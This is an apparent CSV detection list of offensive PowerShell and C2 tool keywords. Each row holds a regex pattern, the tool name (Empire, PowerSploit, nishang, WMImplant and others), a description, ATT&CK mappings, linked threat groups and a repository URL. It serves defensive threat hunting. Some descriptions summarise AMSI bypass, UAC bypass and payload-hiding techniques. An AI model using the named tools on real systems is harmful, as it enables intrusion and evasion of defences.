"*Invoke-ProcessHunter*",".{0,1000}Invoke\-ProcessHunter.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","49365"
"*Invoke-ProcessHunter*",".{0,1000}Invoke\-ProcessHunter.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49366"
"*Invoke-ProcessHunter*",".{0,1000}Invoke\-ProcessHunter.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","49367"
"*invoke-processhunter*",".{0,1000}invoke\-processhunter.{0,1000}","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","N/A","10","974","121","2025-03-17T14:04:51Z","2016-07-06T13:25:09Z","49368"
"*Invoke-ProcessKiller*",".{0,1000}Invoke\-ProcessKiller.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49369"
"*Invoke-ProcessPunisher*",".{0,1000}Invoke\-ProcessPunisher.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","49370"
"*Invoke-ProcessScan*",".{0,1000}Invoke\-ProcessScan.{0,1000}","offensive_tool_keyword","Invoke-ProcessScan","This script uses a list from the Equation Group leak from the shadow brokers to provide context to executeables that are running on a system.","T1059.001 - T1016 - T1547.001","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/vysecurity/Invoke-ProcessScan","1","1","N/A","N/A","N/A","1","45","19","2017-06-05T12:19:25Z","2017-06-03T18:36:30Z","49371"
"*Invoke-ProcSpawn -Command *",".{0,1000}Invoke\-ProcSpawn\s\-Command\s.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","49372"
"*Invoke-ProcSpawn*",".{0,1000}Invoke\-ProcSpawn.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","49373"
"*InvokePS1.bat*",".{0,1000}InvokePS1\.bat.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","49374"
"*Invoke-ps2exe*",".{0,1000}Invoke\-ps2exe.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","N/A","10","1395","217","2025-01-05T11:26:50Z","2019-11-08T09:25:02Z","49375"
"*Invoke-PSAmsiScan*",".{0,1000}Invoke\-PSAmsiScan.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","49376"
"*Invoke-PsExec*",".{0,1000}Invoke\-PsExec.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-PsExec.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49377"
"*Invoke-PSexec.ps1*",".{0,1000}Invoke\-PSexec\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49378"
"*Invoke-PsExec.ps1*",".{0,1000}Invoke\-PsExec\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1095","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49379"
"*Invoke-PsExecCmd*",".{0,1000}Invoke\-PsExecCmd.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49380"
"*invoke-psexecpayload*",".{0,1000}invoke\-psexecpayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49381"
"*Invoke-PsGcat*",".{0,1000}Invoke\-PsGcat.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49382"
"*Invoke-PSGcat.ps1*",".{0,1000}Invoke\-PSGcat\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49383"
"*Invoke-PsGcat.ps1*",".{0,1000}Invoke\-PsGcat\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49384"
"*Invoke-PsGcatAgent*",".{0,1000}Invoke\-PsGcatAgent.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49385"
"*Invoke-PsGcatAgent.ps1*",".{0,1000}Invoke\-PsGcatAgent\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49386"
"*Invoke-PSImage*",".{0,1000}Invoke\-PSImage.{0,1000}","offensive_tool_keyword","Invoke-PSImage","Encodes a PowerShell script in the pixels of a PNG file and generates a oneliner to executenInvoke-PSImage takes a PowerShell script and encodes the bytes of the script into the pixels of a PNG image. It generates a oneliner for executing either from a file of from the web.","T1027.003 - T1027..009 - T1218 - T1216 - T1059","TA0005","N/A","Sandworm Team","Defense Evasion","https://github.com/peewpw/Invoke-PSImage","1","1","N/A","N/A","7","10","2176","399","2019-09-23T15:17:03Z","2017-12-17T18:41:44Z","49387"
"*Invoke-PSInject*",".{0,1000}Invoke\-PSInject.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-PSInject.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49388"
"*Invoke-PSInject*",".{0,1000}Invoke\-PSInject.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","49389"
"*Invoke-PSInject.ps1*",".{0,1000}Invoke\-PSInject\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1085","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49390"
"*Invoke-PSInject.ps1*",".{0,1000}Invoke\-PSInject\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","49391"
"*Invoke-Psnmap*",".{0,1000}Invoke\-Psnmap.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","0","N/A","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","49392"
"*Invoke-PSObfuscation*",".{0,1000}Invoke\-PSObfuscation.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","49393"
"*Invoke-PSRemoting*",".{0,1000}Invoke\-PSRemoting.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49394"
"*Invoke-PsUACme -Method *",".{0,1000}Invoke\-PsUACme\s\-Method\s.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","0","N/A","N/A","10","10","1890","311","2024-11-28T10:31:15Z","2019-05-14T06:09:25Z","49395"
"*Invoke-PsUACme*",".{0,1000}Invoke\-PsUACme.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","49396"
"*Invoke-PsUACme*",".{0,1000}Invoke\-PsUACme.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49397"
